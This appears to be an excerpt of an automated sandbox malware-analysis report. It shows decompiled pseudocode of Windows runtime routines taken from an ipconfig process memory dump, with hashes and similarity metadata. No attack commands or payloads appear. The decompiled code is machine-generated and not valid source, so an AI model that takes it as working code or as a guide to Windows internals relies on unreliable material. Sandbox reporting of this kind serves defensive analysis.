              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction ID: 83c5ff5a434ecdad22612ad4699d083993aa45599759b77ddee748efbf0aeeea
              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction Fuzzy Hash: 4501B132790518ABC720DE6ECD60F9FB6AEEFC4764B249164B908CF241DA30EC0187A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E02E99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
              				intOrPtr* _t51;
              				intOrPtr _t59;
              				signed int _t64;
              				signed int _t67;
              				signed int* _t71;
              				signed int _t74;
              				signed int _t77;
              				signed int _t82;
              				intOrPtr* _t84;
              				void* _t85;
              				intOrPtr* _t87;
              				void* _t94;
              				signed int _t95;
              				intOrPtr* _t97;
              				signed int _t99;
              				signed int _t102;
              				void* _t104;
              
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				_t97 = __ecx;
              				_t102 =  *(__ecx + 0x14);
              				if((_t102 & 0x02ffffff) == 0x2000000) {
              					_t102 = _t102 | 0x000007d0;
              				}
              				_t48 =  *[fs:0x30];
              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
              					_t102 = _t102 & 0xff000000;
              				}
              				_t80 = 0x2f885ec;
              				E02EB2280(_t48, 0x2f885ec);
              				_t51 =  *_t97 + 8;
              				if( *_t51 != 0) {
              					L6:
              					return E02EAFFB0(_t80, _t97, _t80);
              				} else {
              					 *(_t97 + 0x14) = _t102;
              					_t84 =  *0x2f8538c; // 0x77ad6888
              					if( *_t84 != 0x2f85388) {
              						_t85 = 3;
              						asm("int 0x29");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						_push(0x2c);
              						_push(0x2f6f6e8);
              						E02EED0E8(0x2f885ec, _t97, _t102);
              						 *((char*)(_t104 - 0x1d)) = 0;
              						_t99 =  *(_t104 + 8);
              						__eflags = _t99;
              						if(_t99 == 0) {
              							L13:
              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              							if(__eflags == 0) {
              								E02F688F5(_t80, _t85, 0x2f85388, _t99, _t102, __eflags);
              							}
              						} else {
              							__eflags = _t99 -  *0x2f886c0; // 0x4007b0
              							if(__eflags == 0) {
              								goto L13;
              							} else {
              								__eflags = _t99 -  *0x2f886b8; // 0x0
              								if(__eflags == 0) {
              									goto L13;
              								} else {
              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
              									__eflags =  *((char*)(_t59 + 0x28));
              									if( *((char*)(_t59 + 0x28)) == 0) {
              										E02EB2280(_t99 + 0xe0, _t99 + 0xe0);
              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
              										__eflags =  *((char*)(_t99 + 0xe5));
              										if(__eflags != 0) {
              											E02F688F5(0x2f885ec, _t85, 0x2f85388, _t99, _t102, __eflags);
              										} else {
              											__eflags =  *((char*)(_t99 + 0xe4));
              											if( *((char*)(_t99 + 0xe4)) == 0) {
              												 *((char*)(_t99 + 0xe4)) = 1;
              												_push(_t99);
              												_push( *((intOrPtr*)(_t99 + 0x24)));
              												E02EDAFD0();
              											}
              											while(1) {
              												_t71 = _t99 + 8;
              												 *(_t104 - 0x2c) = _t71;
              												_t80 =  *_t71;
              												_t95 = _t71[1];
              												 *(_t104 - 0x28) = _t80;
              												 *(_t104 - 0x24) = _t95;
              												while(1) {
              													L19:
              													__eflags = _t95;
              													if(_t95 == 0) {
              														break;
              													}
              													_t102 = _t80;
              													 *(_t104 - 0x30) = _t95;
              													 *(_t104 - 0x24) = _t95 - 1;
              													asm("lock cmpxchg8b [edi]");
              													_t80 = _t102;
              													 *(_t104 - 0x28) = _t80;
              													 *(_t104 - 0x24) = _t95;
              													__eflags = _t80 - _t102;
              													_t99 =  *(_t104 + 8);
              													if(_t80 != _t102) {
              														continue;
              													} else {
              														__eflags = _t95 -  *(_t104 - 0x30);
              														if(_t95 !=  *(_t104 - 0x30)) {
              															continue;
              														} else {
              															__eflags = _t95;
              															if(_t95 != 0) {
              																_t74 = 0;
              																 *(_t104 - 0x34) = 0;
              																_t102 = 0;
              																__eflags = 0;
              																while(1) {
              																	 *(_t104 - 0x3c) = _t102;
              																	__eflags = _t102 - 3;
              																	if(_t102 >= 3) {
              																		break;
              																	}
              																	__eflags = _t74;
              																	if(_t74 != 0) {
              																		L49:
              																		_t102 =  *_t74;
              																		__eflags = _t102;
              																		if(_t102 != 0) {
              																			_t102 =  *(_t102 + 4);
              																			__eflags = _t102;
              																			if(_t102 != 0) {
              																				 *0x2f8b1e0(_t74, _t99);
              																				 *_t102();
              																			}
              																		}
              																		do {
              																			_t71 = _t99 + 8;
              																			 *(_t104 - 0x2c) = _t71;
              																			_t80 =  *_t71;
              																			_t95 = _t71[1];
              																			 *(_t104 - 0x28) = _t80;
              																			 *(_t104 - 0x24) = _t95;
              																			goto L19;
              																		} while (_t74 == 0);
              																		goto L49;
              																	} else {
              																		_t82 = 0;
              																		__eflags = 0;
              																		while(1) {
              																			 *(_t104 - 0x38) = _t82;
              																			__eflags = _t82 -  *0x2f884c0;
              																			if(_t82 >=  *0x2f884c0) {
              																				break;
              																			}
              																			__eflags = _t74;
              																			if(_t74 == 0) {
              																				_t77 = E02F69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
              																				__eflags = _t77;
              																				if(_t77 == 0) {
              																					_t74 = 0;
              																					__eflags = 0;
              																				} else {
              																					_t74 = _t77 + 0xfffffff4;
              																				}
              																				 *(_t104 - 0x34) = _t74;
              																				_t82 = _t82 + 1;
              																				continue;
              																			}
              																			break;
              																		}
              																		_t102 = _t102 + 1;
              																		continue;
              																	}
              																	goto L20;
              																}
              																__eflags = _t74;
              															}
              														}
              													}
              													break;
              												}
              												L20:
              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
              												 *((char*)(_t99 + 0xe5)) = 1;
              												 *((char*)(_t104 - 0x1d)) = 1;
              												goto L21;
              											}
              										}
              										L21:
              										 *(_t104 - 4) = 0xfffffffe;
              										E02E9922A(_t99);
              										_t64 = E02EB7D50();
              										__eflags = _t64;
              										if(_t64 != 0) {
              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              										} else {
              											_t67 = 0x7ffe0386;
              										}
              										__eflags =  *_t67;
              										if( *_t67 != 0) {
              											_t67 = E02F68B58(_t99);
              										}
              										__eflags =  *((char*)(_t104 - 0x1d));
              										if( *((char*)(_t104 - 0x1d)) != 0) {
              											__eflags = _t99 -  *0x2f886c0; // 0x4007b0
              											if(__eflags != 0) {
              												__eflags = _t99 -  *0x2f886b8; // 0x0
              												if(__eflags == 0) {
              													_t94 = 0x2f886bc;
              													_t87 = 0x2f886b8;
              													goto L27;
              												} else {
              													__eflags = _t67 | 0xffffffff;
              													asm("lock xadd [edi], eax");
              													if(__eflags == 0) {
              														E02E99240(_t80, _t99, _t99, _t102, __eflags);
              													}
              												}
              											} else {
              												_t94 = 0x2f886c4;
              												_t87 = 0x2f886c0;
              												L27:
              												E02EC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
              											}
              										}
              									} else {
              										goto L13;
              									}
              								}
              							}
              						}
              						return E02EED130(_t80, _t99, _t102);
              					} else {
              						 *_t51 = 0x2f85388;
              						 *((intOrPtr*)(_t51 + 4)) = _t84;
              						 *_t84 = _t51;
              						 *0x2f8538c = _t51;
              						goto L6;
              					}
              				}
              			}





















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a42a01d4468f95796552fdfd1b97d23515a17b7bb5ab2eb0e269f194625a08a
              • Instruction ID: 72c9f7e6cb8bd1d1cf191e47a83c37c2ac17b9ff0c7c749d07eb28a2a98c3c8a
              • Opcode Fuzzy Hash: 7a42a01d4468f95796552fdfd1b97d23515a17b7bb5ab2eb0e269f194625a08a
              • Instruction Fuzzy Hash: D101A472A416049FC7159F14D840B22BBAAEF45364F26906BE6158F792C375DC41CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E02F2C450(intOrPtr* _a4) {
              				signed char _t25;
              				intOrPtr* _t26;
              				intOrPtr* _t27;
              
              				_t26 = _a4;
              				_t25 =  *(_t26 + 0x10);
              				if((_t25 & 0x00000003) != 1) {
              					_push(0);
              					_push(0);
              					_push(0);
              					_push( *((intOrPtr*)(_t26 + 8)));
              					_push(0);
              					_push( *_t26);
              					E02ED9910();
              					_t25 =  *(_t26 + 0x10);
              				}
              				if((_t25 & 0x00000001) != 0) {
              					_push(4);
              					_t7 = _t26 + 4; // 0x4
              					_t27 = _t7;
              					_push(_t27);
              					_push(5);
              					_push(0xfffffffe);
              					E02ED95B0();
              					if( *_t27 != 0) {
              						_push( *_t27);
              						E02ED95D0();
              					}
              				}
              				_t8 = _t26 + 0x14; // 0x14
              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
              				}
              				_push( *_t26);
              				E02ED95D0();
              				return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
              			}







              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction ID: 172d6ec04e162fd518f7d49a2904997a9f65be48c86f0a54163ad1dc919843d6
              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction Fuzzy Hash: 1C01DE72180515BFD721AF25CD80EA7F76EFF85394F018126F244479A0CB22ACA1CAA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E02F64015(signed int __eax, signed int __ecx) {
              				void* __ebx;
              				void* __edi;
              				signed char _t10;
              				signed int _t28;
              
              				_push(__ecx);
              				_t28 = __ecx;
              				asm("lock xadd [edi+0x24], eax");
              				_t10 = (__eax | 0xffffffff) - 1;
              				if(_t10 == 0) {
              					_t1 = _t28 + 0x1c; // 0x1e
              					E02EB2280(_t10, _t1);
              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
              					E02EB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2f886ac);
              					E02E9F900(0x2f886d4, _t28);
              					E02EAFFB0(0x2f886ac, _t28, 0x2f886ac);
              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
              					E02EAFFB0(0, _t28, _t1);
              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
              					}
              					_t10 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
              				}
              				return _t10;
              			}








              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d807180c9aed9ade95eb4432b4851b00477828cced598d0c46c5e4ba85f55d6
              • Instruction ID: 06b04c322e2978a6bc7aba1113053a3faf9dfc153b0daeba39dd06120bc24bb4
              • Opcode Fuzzy Hash: 8d807180c9aed9ade95eb4432b4851b00477828cced598d0c46c5e4ba85f55d6
              • Instruction Fuzzy Hash: 7C018F726819557FD622BB69CD84E53F7ADEF857A0B005225B608CBE11CB24EC11CEE4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 61%
              			E02F5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				void* __edi;
              				void* __esi;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_t32 = __edx;
              				_t27 = __ebx;
              				_v8 =  *0x2f8d360 ^ _t35;
              				_t33 = __edx;
              				_t34 = __ecx;
              				E02EDFA60( &_v60, 0, 0x30);
              				_v20 = _a4;
              				_v16 = _a8;
              				_v28 = _t34;
              				_v24 = _t33;
              				_v54 = 0x1033;
              				if(E02EB7D50() == 0) {
              					_t21 = 0x7ffe0388;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}


















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c983f888378e5911817de498d00d0384a0f4aa49acaf0e8e66263968d85b9715
              • Instruction ID: 7bed5725643b6b81884bd0b43ec189dcfe1e2f26c585b5b1847ec009b1cbd86b
              • Opcode Fuzzy Hash: c983f888378e5911817de498d00d0384a0f4aa49acaf0e8e66263968d85b9715
              • Instruction Fuzzy Hash: 5E015271E40218AFDB14DFA9D841FAFB7B8EF45750F00406AF905EB280D674DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 61%
              			E02F514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				void* __edi;
              				void* __esi;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_t32 = __edx;
              				_t27 = __ebx;
              				_v8 =  *0x2f8d360 ^ _t35;
              				_t33 = __edx;
              				_t34 = __ecx;
              				E02EDFA60( &_v60, 0, 0x30);
              				_v20 = _a4;
              				_v16 = _a8;
              				_v28 = _t34;
              				_v24 = _t33;
              				_v54 = 0x1034;
              				if(E02EB7D50() == 0) {
              					_t21 = 0x7ffe0388;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}

















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 79bdcf149b8fa970eef8e6a0371321b6b7e41e917063353a61a32f8da97e7b1d
              • Instruction ID: 41f25742336168c3bc6eae1b9352be1a87158d3f8918da02a06ef4699d3e7927
              • Opcode Fuzzy Hash: 79bdcf149b8fa970eef8e6a0371321b6b7e41e917063353a61a32f8da97e7b1d
              • Instruction Fuzzy Hash: 07019275A41258AFCB00DF68D841FAFB7B8EF45740F00405AF915EB380D670DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E02E958EC(intOrPtr __ecx) {
              				signed int _v8;
              				char _v28;
              				char _v44;
              				char _v76;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t10;
              				intOrPtr _t16;
              				intOrPtr _t17;
              				intOrPtr _t27;
              				intOrPtr _t28;
              				signed int _t29;
              
              				_v8 =  *0x2f8d360 ^ _t29;
              				_t10 =  *[fs:0x30];
              				_t27 = __ecx;
              				if(_t10 == 0) {
              					L6:
              					_t28 = 0x2e75c80;
              				} else {
              					_t16 =  *((intOrPtr*)(_t10 + 0x10));
              					if(_t16 == 0) {
              						goto L6;
              					} else {
              						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
              					}
              				}
              				if(E02E95943() != 0 &&  *0x2f85320 > 5) {
              					E02F17B5E( &_v44, _t27);
              					_t22 =  &_v28;
              					E02F17B5E( &_v28, _t28);
              					_t11 = E02F17B9C(0x2f85320, 0x2e7bf15,  &_v28, _t22, 4,  &_v76);
              				}
              				return E02EDB640(_t11, _t17, _v8 ^ _t29, 0x2e7bf15, _t27, _t28);
              			}















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e8c4e9bf2e4005649b6250c18285e33c260865751c972ff730525cd553cbdbd
              • Instruction ID: edb8d2b1a987a11ca8f7df286785d50e9f44f6c26cb8cadb9bfbf8b67144e234
              • Opcode Fuzzy Hash: 7e8c4e9bf2e4005649b6250c18285e33c260865751c972ff730525cd553cbdbd
              • Instruction Fuzzy Hash: E501A731A40108DFDB15EF29DC019BFB7A9EF44264FD5906AA9159B244DF30DD01CA50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02F61074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
              				char _v8;
              				void* _v11;
              				unsigned int _v12;
              				void* _v15;
              				void* __esi;
              				void* __ebp;
              				char* _t16;
              				signed int* _t35;
              
              				_t22 = __ebx;
              				_t35 = __ecx;
              				_v8 = __edx;
              				_t13 =  !( *__ecx) + 1;
              				_v12 =  !( *__ecx) + 1;
              				if(_a4 != 0) {
              					E02F6165E(__ebx, 0x2f88ae4, (__edx -  *0x2f88b04 >> 0x14) + (__edx -  *0x2f88b04 >> 0x14), __edi, __ecx, (__edx -  *0x2f88b04 >> 0x14) + (__edx -  *0x2f88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
              				}
              				E02F5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
              				if(E02EB7D50() == 0) {
              					_t16 = 0x7ffe0388;
              				} else {
              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				if( *_t16 != 0) {
              					_t16 = E02F4FE3F(_t22, _t35, _v8, _v12);
              				}
              				return _t16;
              			}











              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cc9be77bdb013a8433934bf42b3bcbd51e0f213577ddb897a41be18b6c31939
              • Instruction ID: f29c4080a4acce3f9bea09b3254dd3d5bafbce91d81591f2f9afcab71d2cfbd2
              • Opcode Fuzzy Hash: 6cc9be77bdb013a8433934bf42b3bcbd51e0f213577ddb897a41be18b6c31939
              • Instruction Fuzzy Hash: 6A012872504745AFCB11EB28CD04B2BB7E6EBC4794F048A19FA8993790DE31D450CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
              				signed char _t11;
              				signed char* _t12;
              				intOrPtr _t24;
              				signed short* _t25;
              
              				_t25 = __edx;
              				_t24 = __ecx;
              				_t11 = ( *[fs:0x30])[0x50];
              				if(_t11 != 0) {
              					if( *_t11 == 0) {
              						goto L1;
              					}
              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
              					L2:
              					if( *_t12 != 0) {
              						_t12 =  *[fs:0x30];
              						if((_t12[0x240] & 0x00000004) == 0) {
              							goto L3;
              						}
              						if(E02EB7D50() == 0) {
              							_t12 = 0x7ffe0385;
              						} else {
              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
              						}
              						if(( *_t12 & 0x00000020) == 0) {
              							goto L3;
              						}
              						return E02F17016(_a4, _t24, 0, 0, _t25, 0);
              					}
              					L3:
              					return _t12;
              				}
              				L1:
              				_t12 = 0x7ffe0384;
              				goto L2;
              			}







              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction ID: eb547f15fa80861b1d4cfd913d90e984585b0c8a934d49d1bce8c370bd800da8
              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction Fuzzy Hash: 77017132280580DFD322971CC994F6677D8EB55758F0990A5FA19CFB51D728EC40C620
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E02F4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				short _v58;
              				char _v64;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_t24 = __ebx;
              				_v12 =  *0x2f8d360 ^ _t32;
              				_t30 = __edx;
              				_t31 = __ecx;
              				E02EDFA60( &_v64, 0, 0x30);
              				_v24 = _a4;
              				_v32 = _t31;
              				_v28 = _t30;
              				_v58 = 0x266;
              				if(E02EB7D50() == 0) {
              					_t18 = 0x7ffe0388;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v64);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
              			}
















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d4329fa672a60b339c389d79e42b30ae28f82924369dc5692afaa69bb1c1ceb1
              • Instruction ID: 7c4856526638bbccaf3d57c131bab6a866b3a348ef1048575a81125152e43109
              • Opcode Fuzzy Hash: d4329fa672a60b339c389d79e42b30ae28f82924369dc5692afaa69bb1c1ceb1
              • Instruction Fuzzy Hash: E9018471E40218AFDB14DBA9D845FAFBBB8EF45750F04416AF905AB290EA70DA01CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E02F4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				short _v58;
              				char _v64;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_t24 = __ebx;
              				_v12 =  *0x2f8d360 ^ _t32;
              				_t30 = __edx;
              				_t31 = __ecx;
              				E02EDFA60( &_v64, 0, 0x30);
              				_v24 = _a4;
              				_v32 = _t31;
              				_v28 = _t30;
              				_v58 = 0x267;
              				if(E02EB7D50() == 0) {
              					_t18 = 0x7ffe0388;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v64);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
              			}
















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53439a911b89feade4987ceef15d21923ee3766311c1a72c0a70114fc82f20d5
              • Instruction ID: 6d9d628f3efd7b93639c59f6d806fab8a9fefa7bbe40561a560722552d26cd8a
              • Opcode Fuzzy Hash: 53439a911b89feade4987ceef15d21923ee3766311c1a72c0a70114fc82f20d5
              • Instruction Fuzzy Hash: C601D471E40218AFCB14DFA8D801FAEBBB8EF40700F00806AF904AB281DA70D901CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E02F68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				short _v66;
              				char _v72;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v12 =  *0x2f8d360 ^ _t32;
              				_t31 = _a8;
              				_t30 = _a12;
              				_v66 = 0x1c20;
              				_v40 = __ecx;
              				_v36 = __edx;
              				_v32 = _a4;
              				_v28 = _a8;
              				_v24 = _a12;
              				if(E02EB7D50() == 0) {
              					_t18 = 0x7ffe0386;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v72);
              				_push(0x14);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
              			}
















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
